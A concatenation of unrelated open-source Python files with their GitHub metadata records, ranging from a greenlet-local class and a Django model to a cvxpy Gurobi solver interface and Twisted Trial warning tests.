d = object.__getattribute__(self, '_local__dicts').get(getcurrent())
if d is None:
# it's OK to acquire the lock here and not earlier, because the above code won't
# switch out
# however, subclassed __init__ might switch, so we do need to acquire the lock here
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_init_locals(self)
return object.__getattribute__(self, name)
finally:
lock.release()
else:
object.__setattr__(self, '__dict__', d)
return object.__getattribute__(self, name)
def __setattr__(self, name, value):
if name == '__dict__':
raise AttributeError(
"%r object attribute '__dict__' is read-only" % self.__class__.__name__)
d = object.__getattribute__(self, '_local__dicts').get(getcurrent())
if d is None:
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_init_locals(self)
return object.__setattr__(self, name, value)
finally:
lock.release()
else:
object.__setattr__(self, '__dict__', d)
return object.__setattr__(self, name, value)
def __delattr__(self, name):
if name == '__dict__':
raise AttributeError(
"%r object attribute '__dict__' is read-only" % self.__class__.__name__)
d = object.__getattribute__(self, '_local__dicts').get(getcurrent())
if d is None:
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_init_locals(self)
return object.__delattr__(self, name)
finally:
lock.release()
else:
object.__setattr__(self, '__dict__', d)
return object.__delattr__(self, name)
def __copy__(self):
currentId = getcurrent()
d = object.__getattribute__(self, '_local__dicts').get(currentId)
duplicate = copy(d)
cls = type(self)
if cls.__init__ is not object.__init__:
args, kw = object.__getattribute__(self, '_local__args')
instance = cls(*args, **kw)
else:
instance = cls()
object.__setattr__(instance, '_local__dicts', {
currentId: duplicate
})
return instance
| {
"content_hash": "1b025684dbb85cec716b51faf6505cd1",
"timestamp": "",
"source": "github",
"line_count": 109,
"max_line_length": 95,
"avg_line_length": 34.81651376146789,
"alnum_prop": 0.5238471673254282,
"repo_name": "veegee/guv",
"id": "1112b0dd08349cfeab40b6e5f37c579f1db5991d",
"size": "3795",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "guv/green/greenlet_local.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "4634"
},
{
"name": "Python",
"bytes": "308368"
}
],
"symlink_target": ""
} |
"""Models for the general application."""
from django.db import models
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from django.contrib.postgres.search import SearchVectorField
from django.contrib.postgres.indexes import GinIndex
from search.utils import get_template_text
class GeneralPage(models.Model):
"""Model for general page in database."""
MODEL_NAME = _("General Page")
# Auto-incrementing 'id' field is automatically set by Django
slug = models.SlugField(unique=True)
name = models.CharField(max_length=100)
template = models.CharField(max_length=100)
url_name = models.CharField(max_length=100)
search_vector = SearchVectorField(null=True)
def get_absolute_url(self):
"""Return the canonical URL for a GeneralPage.
Returns:
URL as string.
"""
return reverse(self.url_name)
def __str__(self):
"""Text representation of GeneralPage object.
Returns:
Name of page (str).
"""
return self.name
def index_contents(self):
"""Return dictionary for search indexing.
Returns:
Dictionary of content for search indexing. The dictionary keys
are the weightings of content, and the dictionary values
are strings of content to index.
"""
return {
'A': self.name,
'B': get_template_text(self.template),
}
class Meta:
"""Meta options for model."""
indexes = [
GinIndex(fields=['search_vector'])
]
| {
"content_hash": "fe2453fec49bdb9488e0afccff6b5fc4",
"timestamp": "",
"source": "github",
"line_count": 57,
"max_line_length": 74,
"avg_line_length": 28.403508771929825,
"alnum_prop": 0.6324891908585547,
"repo_name": "uccser/cs-unplugged",
"id": "9462440705f35516e4d7ea38cbd817848c28c1bf",
"size": "1619",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "csunplugged/general/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "7927"
},
{
"name": "HTML",
"bytes": "432891"
},
{
"name": "JavaScript",
"bytes": "104806"
},
{
"name": "Python",
"bytes": "1257568"
},
{
"name": "SCSS",
"bytes": "67560"
},
{
"name": "Shell",
"bytes": "12461"
}
],
"symlink_target": ""
} |
import factory
from .models import Application, Authentication, User
class ApplicationFactory(factory.DjangoModelFactory):
FACTORY_FOR = Application
name = 'test'
client_id = '2134'
client_secret = 'safsdfdsf'
callback_url = 'http://testserver'
class AuthenticationFactory(factory.DjangoModelFactory):
FACTORY_FOR = Authentication
application = factory.SubFactory(ApplicationFactory)
redirect_uri = 'http://testserver'
scope = ''
class UserFactory(factory.DjangoModelFactory):
FACTORY_FOR = User
login = 'test'
uid = 1
application = factory.SubFactory(ApplicationFactory)
avatar_url = 'http://example.org/foo.png'
url = 'http://example.org/foo'
email = '[email protected]'
| {
"content_hash": "c044f1a879eb12b12683cce6a18103ee",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 56,
"avg_line_length": 24.032258064516128,
"alnum_prop": 0.7046979865771812,
"repo_name": "kitsunde/django-octocat",
"id": "4690cecf548afd35940e1805fc4ca20335702b3d",
"size": "745",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "github/factories.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "60952"
}
],
"symlink_target": ""
} |
from distutils.core import setup
setup(
name='hk_data_sources',
version='0.0.1',
packages=['hk_data_sources'],
url='',
license='MIT',
author='christlc',
author_email='[email protected]',
description=''
)
| {
"content_hash": "0052451a204e22f7a84df27caff0fa40",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 42,
"avg_line_length": 20.166666666666668,
"alnum_prop": 0.6157024793388429,
"repo_name": "christlc/hongkong_data_sources",
"id": "1ba2572d745b462ab2b1824d841c03fc65c8df21",
"size": "242",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "3873"
},
{
"name": "Shell",
"bytes": "25"
}
],
"symlink_target": ""
} |
"""
shellstreaming.istream.stdin
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:synopsis: Infinite input stream from stdin
"""
from relshell.record import Record
from relshell.recorddef import RecordDef
from shellstreaming.istream.base import Base
class Stdin(Base):
"""Infinite input stream from stdin"""
def __init__(self, **kw):
"""Constructor
"""
Base.__init__(self, **kw)
def run(self):
rdef = RecordDef([{'name': 'line', 'type': 'STRING'}])
while True:
if self.interrupted():
break
# sys.stderr.write('Enter record contents: ')
try:
line = raw_input().rstrip('\r\n')
self.add(rdef, Record(line))
except EOFError:
continue
| {
"content_hash": "722058a75b13f203e0e71ff28a748ec5",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 62,
"avg_line_length": 26.533333333333335,
"alnum_prop": 0.5251256281407035,
"repo_name": "laysakura/shellstreaming",
"id": "723543f61ca4e95e23677c6672769ac49118b0ec",
"size": "820",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "shellstreaming/istream/stdin.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "25465"
},
{
"name": "JavaScript",
"bytes": "49784"
},
{
"name": "Python",
"bytes": "238726"
}
],
"symlink_target": ""
} |
"""Parametric image model that uses mini resnet."""
from typing import Any, Sequence, Tuple, Mapping
import gin
import haiku as hk
import jax
import jax.numpy as jnp
from learned_optimization.tasks import base
from learned_optimization.tasks import resnet
from learned_optimization.tasks.datasets import base as datasets_base
from learned_optimization.tasks.parametric import cfgobject
from learned_optimization.tasks.parametric import parametric_utils
from learned_optimization.time_filter import model_paths
from learned_optimization.time_filter import time_model
import numpy as onp
Batch = Any
Params = Any
ModelState = Any
PRNGKey = jnp.ndarray
@gin.configurable
class ParametricImageResNet(base.TaskFamily):
"""A parametric image model based on an ResNet."""
def __init__(self, datasets: datasets_base.Datasets,
initial_conv_channels: int, initial_conv_stride: int,
initial_conv_kernel_size: int, blocks_per_group: Sequence[int],
channels_per_group: Sequence[int], max_pool: bool):
super().__init__()
self.datasets = datasets
self.initial_conv_channels = initial_conv_channels
self.initial_conv_stride = initial_conv_stride
self.initial_conv_kernel_size = initial_conv_kernel_size
self.blocks_per_group = blocks_per_group
self.channels_per_group = channels_per_group
self.max_pool = max_pool
def sample(self, key: PRNGKey) -> cfgobject.CFGNamed:
return cfgobject.CFGNamed("ParametricImageResNet", {
"activation": parametric_utils.SampleActivation.sample(key),
})
def task_fn(self, task_params) -> base.Task:
num_classes = self.datasets.extra_info["num_classes"]
datasets = self.datasets
def _forward(inp):
act_fn = parametric_utils.SampleActivation.get_dynamic(
task_params.values["activation"])
module = resnet.ResNet(
blocks_per_group=self.blocks_per_group,
num_classes=num_classes,
channels_per_group=self.channels_per_group,
initial_conv_channels=self.initial_conv_channels,
initial_conv_kernel_size=self.initial_conv_kernel_size,
max_pool=self.max_pool,
act_fn=act_fn)
logits = module(inp, is_training=True)
return logits
class _Task(base.Task):
"""Constructed task sample."""
def __init__(self):
super().__init__()
self.datasets = datasets
def init_with_state(self, key: PRNGKey) -> Tuple[Params, ModelState]:
init_net, unused_apply_net = hk.transform_with_state(_forward)
image = next(self.datasets.train)["image"]
params, state = init_net(key, image)
return params, state
def loss_with_state(self, params: Params, state: ModelState, key: PRNGKey,
data: Batch) -> jnp.ndarray:
net = hk.transform_with_state(_forward)
image = data["image"]
logits, state = net.apply(params, state, key, image)
labels = jax.nn.one_hot(data["label"], num_classes)
vec_loss = base.softmax_cross_entropy(logits=logits, labels=labels)
return jnp.mean(vec_loss), state
def loss_with_state_and_aux(
self, params: Params, state: ModelState, key: PRNGKey, data: Batch
) -> Tuple[jnp.ndarray, ModelState, Mapping[str, jnp.ndarray]]:
loss, state = self.loss_with_state(params, state, key, data)
return loss, state, {}
def normalizer(self, loss):
max_class = onp.log(2 * num_classes)
loss = jnp.nan_to_num(
loss, nan=max_class, neginf=max_class, posinf=max_class)
# shift to [0, 10] then clip.
loss = 10 * (loss / max_class)
return jnp.clip(loss, 0, 10)
return _Task()
@gin.configurable
def sample_image_resnet(key: PRNGKey) -> cfgobject.CFGObject:
"""Sample a configuration for a ParametricImageMLP."""
rng = hk.PRNGSequence(key)
kwargs = {}
max_blocks_per_group = parametric_utils.log_int(next(rng), 1, 10)
lf = cfgobject.LogFeature
kwargs["blocks_per_group"] = lf(
tuple([
parametric_utils.log_int(next(rng), 1, max_blocks_per_group)
for _ in range(4)
]))
size_patterns = [(1, 1, 1, 1), (1, 2, 4, 8), (1, 2, 2, 4), (1, 2, 2, 2),
(1, 2, 4, 4)]
pattern = parametric_utils.choice(next(rng), size_patterns)
max_layer_size = parametric_utils.log_int(next(rng), 8, 256)
kwargs["channels_per_group"] = lf(
tuple([max_layer_size * p for p in pattern]))
kwargs["initial_conv_kernel_size"] = parametric_utils.choice(
next(rng), [3, 5, 7])
kwargs["initial_conv_channels"] = lf(
parametric_utils.log_int(next(rng), 8, 64))
kwargs["initial_conv_stride"] = parametric_utils.choice(next(rng), [1, 2])
kwargs["max_pool"] = parametric_utils.choice(next(rng), [True, False])
dataset_name = parametric_utils.SampleImageDataset.sample(next(rng))
image_size = parametric_utils.log_int(next(rng), 8, 64)
batch_size = parametric_utils.log_int(next(rng), 4, 256)
kwargs["datasets"] = cfgobject.CFGObject(dataset_name, {
"image_size": lf((image_size, image_size)),
"batch_size": lf(batch_size),
})
return cfgobject.CFGObject("ParametricImageResNet", kwargs)
@gin.configurable()
def timed_sample_image_resnet(key: PRNGKey, max_time=1e-4):
model_path = model_paths.models[("sample_image_resnet", "time")]
return time_model.rejection_sample(sample_image_resnet, model_path, key,
max_time)
| {
"content_hash": "242d111a91baad1f94eb0ce4c430bfa2",
"timestamp": "",
"source": "github",
"line_count": 149,
"max_line_length": 80,
"avg_line_length": 36.939597315436245,
"alnum_prop": 0.6571584302325582,
"repo_name": "google/learned_optimization",
"id": "334677f5b5221be5100f990cec05e1bde4d7d0ee",
"size": "6095",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "learned_optimization/tasks/parametric/image_resnet.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "177493"
},
{
"name": "Python",
"bytes": "1290675"
}
],
"symlink_target": ""
} |
import numpy as np
import cvxpy.interface as intf
import cvxpy.settings as s
from cvxpy.reductions.solution import Solution, failure_solution
from cvxpy.reductions.solvers import utilities
from cvxpy.reductions.solvers.qp_solvers.qp_solver import QpSolver
def constrain_gurobi_infty(v) -> None:
'''
Limit values of vector v between +/- infinity as
defined in the Gurobi package
'''
import gurobipy as grb
n = len(v)
for i in range(n):
if v[i] >= 1e20:
v[i] = grb.GRB.INFINITY
if v[i] <= -1e20:
v[i] = -grb.GRB.INFINITY
class GUROBI(QpSolver):
"""QP interface for the Gurobi solver"""
MIP_CAPABLE = True
# Map of Gurobi status to CVXPY status.
STATUS_MAP = {2: s.OPTIMAL,
3: s.INFEASIBLE,
5: s.UNBOUNDED,
4: s.INFEASIBLE_OR_UNBOUNDED,
6: s.INFEASIBLE,
7: s.SOLVER_ERROR,
8: s.SOLVER_ERROR,
9: s.USER_LIMIT, # Maximum time expired
# TODO could be anything.
10: s.SOLVER_ERROR,
11: s.SOLVER_ERROR,
12: s.SOLVER_ERROR,
13: s.OPTIMAL_INACCURATE}
def name(self):
return s.GUROBI
def import_solver(self) -> None:
import gurobipy
gurobipy
def apply(self, problem):
"""
Construct QP problem data stored in a dictionary.
The QP has the following form
minimize 1/2 x' P x + q' x
subject to A x = b
F x <= g
"""
import gurobipy as grb
data, inv_data = super(GUROBI, self).apply(problem)
# Add initial guess.
data['init_value'] = utilities.stack_vals(problem.variables, grb.GRB.UNDEFINED)
return data, inv_data
def invert(self, results, inverse_data):
model = results["model"]
x_grb = model.getVars()
n = len(x_grb)
constraints_grb = model.getConstrs()
m = len(constraints_grb)
# Note: Gurobi does not always fill BarIterCount
# and IterCount so better using try/except
try:
bar_iter_count = model.BarIterCount
except AttributeError:
bar_iter_count = 0
try:
simplex_iter_count = model.IterCount
except AttributeError:
simplex_iter_count = 0
# Take the sum in case they both appear. One of them
# will be 0 anyway
iter_count = bar_iter_count + simplex_iter_count
# Start populating attribute dictionary
attr = {s.SOLVE_TIME: model.Runtime,
s.NUM_ITERS: iter_count,
s.EXTRA_STATS: model}
# Map GUROBI statuses back to CVXPY statuses
status = self.STATUS_MAP.get(model.Status, s.SOLVER_ERROR)
if status == s.USER_LIMIT and not model.SolCount:
status = s.INFEASIBLE_INACCURATE
if (status in s.SOLUTION_PRESENT) or (model.solCount > 0):
opt_val = model.objVal + inverse_data[s.OFFSET]
x = np.array([x_grb[i].X for i in range(n)])
primal_vars = {
GUROBI.VAR_ID:
intf.DEFAULT_INTF.const_to_matrix(np.array(x))
}
# Only add duals if not a MIP.
dual_vars = None
if not inverse_data[GUROBI.IS_MIP]:
y = -np.array([constraints_grb[i].Pi for i in range(m)])
dual_vars = {GUROBI.DUAL_VAR_ID: y}
sol = Solution(status, opt_val, primal_vars, dual_vars, attr)
else:
sol = failure_solution(status, attr)
return sol
def solve_via_data(self, data, warm_start: bool, verbose: bool, solver_opts, solver_cache=None):
import gurobipy as grb
# N.B. Here we assume that the matrices in data are in csc format
P = data[s.P]
q = data[s.Q]
A = data[s.A].tocsr() # Convert A matrix to csr format
b = data[s.B]
F = data[s.F].tocsr() # Convert F matrix to csr format
g = data[s.G]
n = data['n_var']
# Constrain values between bounds
constrain_gurobi_infty(b)
constrain_gurobi_infty(g)
# Create a new model
if 'env' in solver_opts:
# Specifies environment to create Gurobi model for control over licensing and parameters
# https://www.gurobi.com/documentation/9.1/refman/environments.html
default_env = solver_opts['env']
del solver_opts['env']
model = grb.Model(env=default_env)
else:
# Create Gurobi model using default (unspecified) environment
model = grb.Model()
# Pass through verbosity
model.setParam("OutputFlag", verbose)
# Add variables
vtypes = {}
for ind in data[s.BOOL_IDX]:
vtypes[ind] = grb.GRB.BINARY
for ind in data[s.INT_IDX]:
vtypes[ind] = grb.GRB.INTEGER
for i in range(n):
if i not in vtypes:
vtypes[i] = grb.GRB.CONTINUOUS
x_grb = model.addVars(int(n),
ub={i: grb.GRB.INFINITY for i in range(n)},
lb={i: -grb.GRB.INFINITY for i in range(n)},
vtype=vtypes)
if warm_start and solver_cache is not None \
and self.name() in solver_cache:
old_model = solver_cache[self.name()]
old_status = self.STATUS_MAP.get(old_model.Status,
s.SOLVER_ERROR)
if (old_status in s.SOLUTION_PRESENT) or (old_model.solCount > 0):
old_x_grb = old_model.getVars()
for idx in range(len(x_grb)):
x_grb[idx].start = old_x_grb[idx].X
elif warm_start:
# Set the start value of Gurobi vars to user provided values.
for idx in range(len(x_grb)):
x_grb[idx].start = data['init_value'][idx]
model.update()
x = np.array(model.getVars(), copy=False)
if A.shape[0] > 0:
if hasattr(model, 'addMConstrs'):
# We can pass all of A @ x == b at once, use stable API
# introduced with Gurobi v9
model.addMConstrs(A, None, grb.GRB.EQUAL, b)
elif hasattr(model, '_v811_addMConstrs'):
# We can pass all of A @ x == b at once, API only for Gurobi
# v811
A.eliminate_zeros() # Work around bug in gurobipy v811
sense = np.repeat(grb.GRB.EQUAL, A.shape[0])
model._v811_addMConstrs(A, sense, b)
else:
# Add equality constraints: iterate over the rows of A
# adding each row into the model
for i in range(A.shape[0]):
start = A.indptr[i]
end = A.indptr[i+1]
variables = x[A.indices[start:end]]
coeff = A.data[start:end]
expr = grb.LinExpr(coeff, variables)
model.addConstr(expr, grb.GRB.EQUAL, b[i])
model.update()
if F.shape[0] > 0:
if hasattr(model, 'addMConstrs'):
# We can pass all of F @ x <= g at once, use stable API
# introduced with Gurobi v9
model.addMConstrs(F, None, grb.GRB.LESS_EQUAL, g)
elif hasattr(model, '_v811_addMConstrs'):
# We can pass all of F @ x <= g at once, API only for Gurobi
# v811.
F.eliminate_zeros() # Work around bug in gurobipy v811
sense = np.repeat(grb.GRB.LESS_EQUAL, F.shape[0])
model._v811_addMConstrs(F, sense, g)
else:
# Add inequality constraints: iterate over the rows of F
# adding each row into the model
for i in range(F.shape[0]):
start = F.indptr[i]
end = F.indptr[i+1]
variables = x[F.indices[start:end]]
coeff = F.data[start:end]
expr = grb.LinExpr(coeff, variables)
model.addConstr(expr, grb.GRB.LESS_EQUAL, g[i])
model.update()
# Define objective
if hasattr(model, 'setMObjective'):
# Use stable API starting in Gurobi v9
P = P.tocoo()
model.setMObjective(0.5 * P, q, 0.0)
elif hasattr(model, '_v811_setMObjective'):
# Use temporary API for Gurobi v811 only
P = P.tocoo()
model._v811_setMObjective(0.5 * P, q)
else:
obj = grb.QuadExpr()
if P.count_nonzero(): # If there are any nonzero elms in P
P = P.tocoo()
obj.addTerms(0.5*P.data, vars=list(x[P.row]),
vars2=list(x[P.col]))
obj.add(grb.LinExpr(q, x)) # Add linear part
model.setObjective(obj) # Set objective
model.update()
# Set parameters
model.setParam("QCPDual", True)
for key, value in solver_opts.items():
model.setParam(key, value)
# Update model
model.update()
if 'save_file' in solver_opts:
model.write(solver_opts['save_file'])
# Solve problem
results_dict = {}
try:
# Solve
model.optimize()
if model.Status == 4 and solver_opts.get('reoptimize', False):
# INF_OR_UNBD. Solve again to get a definitive answer.
model.setParam("DualReductions", 0)
model.optimize()
except Exception: # Error in the solution
results_dict["status"] = s.SOLVER_ERROR
results_dict["model"] = model
if solver_cache is not None:
solver_cache[self.name()] = model
return results_dict
| {
"content_hash": "829cc7343aceeba48cad68fbc81de2ea",
"timestamp": "",
"source": "github",
"line_count": 273,
"max_line_length": 100,
"avg_line_length": 36.83150183150183,
"alnum_prop": 0.5255096966683243,
"repo_name": "merraksh/cvxpy",
"id": "47a4251a3b12e03b91cc26999310b08710962cd1",
"size": "10055",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cvxpy/reductions/solvers/qp_solvers/gurobi_qpif.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "120010"
},
{
"name": "C++",
"bytes": "5687983"
},
{
"name": "CMake",
"bytes": "694"
},
{
"name": "Makefile",
"bytes": "6320"
},
{
"name": "Python",
"bytes": "2149670"
},
{
"name": "SWIG",
"bytes": "2403"
},
{
"name": "Shell",
"bytes": "3117"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, division, print_function
import salty
import unittest
class data_manipulation_tests(unittest.TestCase):
data = ['cpt']
data2 = ['cpt', 'density', 'viscosity']
data_ranges = [[200, 1000], [900, 1300], [0, 2]]
T = [298.1, 298.16]
P = [101, 102]
devmodel1 = salty.aggregate_data(data2, T=T, P=P, impute=True,
data_ranges=data_ranges,
scale_center=False)
devmodel = salty.aggregate_data(data2, T=T, P=P, impute=True,
data_ranges=data_ranges)
def test_1_aggregate_data(self):
devmodel = salty.aggregate_data(self.data, T=self.T, P=self.P)
return devmodel
def test_2_devmodel_to_array(self):
X_train, Y_train, X_test, Y_test = salty.devmodel_to_array(
self.devmodel, train_fraction=0.8)
return X_train, Y_train, X_test, Y_test
def test_3_merge_duplicates(self):
data = salty.merge_duplicates(self.devmodel, keep_descriptors=True)
return data
def test_4_assign_category(self):
data = salty.assign_category(self.devmodel1.Data)
return data
def test_benchmark(self):
salty.Benchmark.run(self.test_1_aggregate_data)
salty.Benchmark.run(self.test_2_devmodel_to_array)
salty.Benchmark.run(self.test_3_merge_duplicates)
salty.Benchmark.run(self.test_4_assign_category)
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "f8e9d67c37de8fbe49aeb606619879c7",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 75,
"avg_line_length": 35.30232558139535,
"alnum_prop": 0.6054018445322793,
"repo_name": "wesleybeckner/salty",
"id": "c371e663b93173b670e6ba122d7fd836a0d879ed",
"size": "1518",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "salty/tests/test_data_manipulation.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "3196332"
},
{
"name": "Makefile",
"bytes": "1021"
},
{
"name": "Python",
"bytes": "73667"
},
{
"name": "Ruby",
"bytes": "68"
}
],
"symlink_target": ""
} |
"""
Tests for Trial's interaction with the Python warning system.
"""
import sys, warnings
from StringIO import StringIO
from twisted.python.filepath import FilePath
from twisted.trial.unittest import TestCase, _collectWarnings
from twisted.trial.reporter import TestResult
class Mask(object):
"""
Hide a L{TestCase} definition from trial's automatic discovery mechanism.
"""
class MockTests(TestCase):
"""
A test case which is used by L{FlushWarningsTests} to verify behavior
which cannot be verified by code inside a single test method.
"""
message = "some warning text"
category = UserWarning
def test_unflushed(self):
"""
Generate a warning and don't flush it.
"""
warnings.warn(self.message, self.category)
def test_flushed(self):
"""
Generate a warning and flush it.
"""
warnings.warn(self.message, self.category)
self.assertEqual(len(self.flushWarnings()), 1)
class FlushWarningsTests(TestCase):
"""
Tests for L{TestCase.flushWarnings}, an API for examining the warnings
emitted so far in a test.
"""
def assertDictSubset(self, set, subset):
"""
Assert that all the keys present in C{subset} are also present in
C{set} and that the corresponding values are equal.
"""
for k, v in subset.iteritems():
self.assertEqual(set[k], v)
def assertDictSubsets(self, sets, subsets):
"""
For each pair of corresponding elements in C{sets} and C{subsets},
assert that the element from C{subsets} is a subset of the element from
C{sets}.
"""
self.assertEqual(len(sets), len(subsets))
for a, b in zip(sets, subsets):
self.assertDictSubset(a, b)
def test_none(self):
"""
If no warnings are emitted by a test, L{TestCase.flushWarnings} returns
an empty list.
"""
self.assertEqual(self.flushWarnings(), [])
def test_several(self):
"""
If several warnings are emitted by a test, L{TestCase.flushWarnings}
returns a list containing all of them.
"""
firstMessage = "first warning message"
firstCategory = UserWarning
warnings.warn(message=firstMessage, category=firstCategory)
secondMessage = "second warning message"
secondCategory = RuntimeWarning
warnings.warn(message=secondMessage, category=secondCategory)
self.assertDictSubsets(
self.flushWarnings(),
[{'category': firstCategory, 'message': firstMessage},
{'category': secondCategory, 'message': secondMessage}])
def test_repeated(self):
"""
The same warning triggered twice from the same place is included twice
in the list returned by L{TestCase.flushWarnings}.
"""
message = "the message"
category = RuntimeWarning
for i in range(2):
warnings.warn(message=message, category=category)
self.assertDictSubsets(
self.flushWarnings(),
[{'category': category, 'message': message}] * 2)
def test_cleared(self):
"""
After a particular warning event has been returned by
L{TestCase.flushWarnings}, it is not returned by subsequent calls.
"""
message = "the message"
category = RuntimeWarning
warnings.warn(message=message, category=category)
self.assertDictSubsets(
self.flushWarnings(),
[{'category': category, 'message': message}])
self.assertEqual(self.flushWarnings(), [])
def test_unflushed(self):
"""
Any warnings emitted by a test which are not flushed are emitted to the
Python warning system.
"""
result = TestResult()
case = Mask.MockTests('test_unflushed')
case.run(result)
warningsShown = self.flushWarnings([Mask.MockTests.test_unflushed])
self.assertEqual(warningsShown[0]['message'], 'some warning text')
self.assertIdentical(warningsShown[0]['category'], UserWarning)
where = case.test_unflushed.im_func.func_code
filename = where.co_filename
# If someone edits MockTests.test_unflushed, the value added to
# firstlineno might need to change.
lineno = where.co_firstlineno + 4
self.assertEqual(warningsShown[0]['filename'], filename)
self.assertEqual(warningsShown[0]['lineno'], lineno)
self.assertEqual(len(warningsShown), 1)
def test_flushed(self):
"""
Any warnings emitted by a test which are flushed are not emitted to the
Python warning system.
"""
result = TestResult()
case = Mask.MockTests('test_flushed')
output = StringIO()
monkey = self.patch(sys, 'stdout', output)
case.run(result)
monkey.restore()
self.assertEqual(output.getvalue(), "")
def test_warningsConfiguredAsErrors(self):
"""
If a warnings filter has been installed which turns warnings into
exceptions, tests have an error added to the reporter for them for each
unflushed warning.
"""
class CustomWarning(Warning):
pass
result = TestResult()
case = Mask.MockTests('test_unflushed')
case.category = CustomWarning
originalWarnings = warnings.filters[:]
try:
warnings.simplefilter('error')
case.run(result)
self.assertEqual(len(result.errors), 1)
self.assertIdentical(result.errors[0][0], case)
result.errors[0][1].trap(CustomWarning)
finally:
warnings.filters[:] = originalWarnings
def test_flushedWarningsConfiguredAsErrors(self):
"""
If a warnings filter has been installed which turns warnings into
exceptions, tests which emit those warnings but flush them do not have
an error added to the reporter.
"""
class CustomWarning(Warning):
pass
result = TestResult()
case = Mask.MockTests('test_flushed')
case.category = CustomWarning
originalWarnings = warnings.filters[:]
try:
warnings.simplefilter('error')
case.run(result)
self.assertEqual(result.errors, [])
finally:
warnings.filters[:] = originalWarnings
def test_multipleFlushes(self):
"""
Any warnings emitted after a call to L{TestCase.flushWarnings} can be
flushed by another call to L{TestCase.flushWarnings}.
"""
warnings.warn("first message")
self.assertEqual(len(self.flushWarnings()), 1)
warnings.warn("second message")
self.assertEqual(len(self.flushWarnings()), 1)
def test_filterOnOffendingFunction(self):
"""
The list returned by L{TestCase.flushWarnings} includes only those
warnings which refer to the source of the function passed as the value
for C{offendingFunction}, if a value is passed for that parameter.
"""
firstMessage = "first warning text"
firstCategory = UserWarning
def one():
warnings.warn(firstMessage, firstCategory, stacklevel=1)
secondMessage = "some text"
secondCategory = RuntimeWarning
def two():
warnings.warn(secondMessage, secondCategory, stacklevel=1)
one()
two()
self.assertDictSubsets(
self.flushWarnings(offendingFunctions=[one]),
[{'category': firstCategory, 'message': firstMessage}])
self.assertDictSubsets(
self.flushWarnings(offendingFunctions=[two]),
[{'category': secondCategory, 'message': secondMessage}])
def test_invalidFilter(self):
"""
If an object which is neither a function nor a method is included in
the C{offendingFunctions} list, L{TestCase.flushWarnings} raises
L{ValueError}. Such a call flushes no warnings.
"""
warnings.warn("oh no")
self.assertRaises(ValueError, self.flushWarnings, [None])
self.assertEqual(len(self.flushWarnings()), 1)
def test_missingSource(self):
"""
If a function the source of which is not available is including in the
C{offendingFunctions} list, L{TestCase.flushWarnings} raises
L{IOError}. Such a call flushes no warnings.
"""
package = FilePath(self.mktemp()).child('twisted_private_helper')
package.makedirs()
package.child('__init__.py').setContent('')
package.child('missingsourcefile.py').setContent('''
import warnings
def foo():
warnings.warn("oh no")
''')
sys.path.insert(0, package.parent().path)
self.addCleanup(sys.path.remove, package.parent().path)
from twisted_private_helper import missingsourcefile
self.addCleanup(sys.modules.pop, 'twisted_private_helper')
self.addCleanup(sys.modules.pop, missingsourcefile.__name__)
package.child('missingsourcefile.py').remove()
missingsourcefile.foo()
self.assertRaises(
IOError, self.flushWarnings, [missingsourcefile.foo])
self.assertEqual(len(self.flushWarnings()), 1)
class FakeWarning(Warning):
pass
class CollectWarningsTests(TestCase):
"""
Tests for L{_collectWarnings}.
"""
def test_callsObserver(self):
"""
L{_collectWarnings} calls the observer with each emitted warning.
"""
firstMessage = "dummy calls observer warning"
secondMessage = firstMessage[::-1]
events = []
def f():
events.append('call')
warnings.warn(firstMessage)
warnings.warn(secondMessage)
events.append('returning')
_collectWarnings(events.append, f)
self.assertEqual(events[0], 'call')
self.assertEqual(events[1].message, firstMessage)
self.assertEqual(events[2].message, secondMessage)
self.assertEqual(events[3], 'returning')
self.assertEqual(len(events), 4)
def test_suppresses(self):
"""
Any warnings emitted by a call to a function passed to
L{_collectWarnings} are not actually emitted to the warning system.
"""
output = StringIO()
self.patch(sys, 'stdout', output)
_collectWarnings(lambda x: None, warnings.warn, "text")
self.assertEqual(output.getvalue(), "")
def test_callsFunction(self):
"""
L{_collectWarnings} returns the result of calling the callable passed to
it with the parameters given.
"""
arguments = []
value = object()
def f(*args, **kwargs):
arguments.append((args, kwargs))
return value
result = _collectWarnings(lambda x: None, f, 1, 'a', b=2, c='d')
self.assertEqual(arguments, [((1, 'a'), {'b': 2, 'c': 'd'})])
self.assertIdentical(result, value)
def test_duplicateWarningCollected(self):
"""
Subsequent emissions of a warning from a particular source site can be
collected by L{_collectWarnings}. In particular, the per-module
emitted-warning cache should be bypassed (I{__warningregistry__}).
"""
# Make sure the worst case is tested: if __warningregistry__ isn't in a
# module's globals, then the warning system will add it and start using
# it to avoid emitting duplicate warnings. Delete __warningregistry__
# to ensure that even modules which are first imported as a test is
# running still interact properly with the warning system.
global __warningregistry__
del __warningregistry__
def f():
warnings.warn("foo")
warnings.simplefilter('default')
f()
events = []
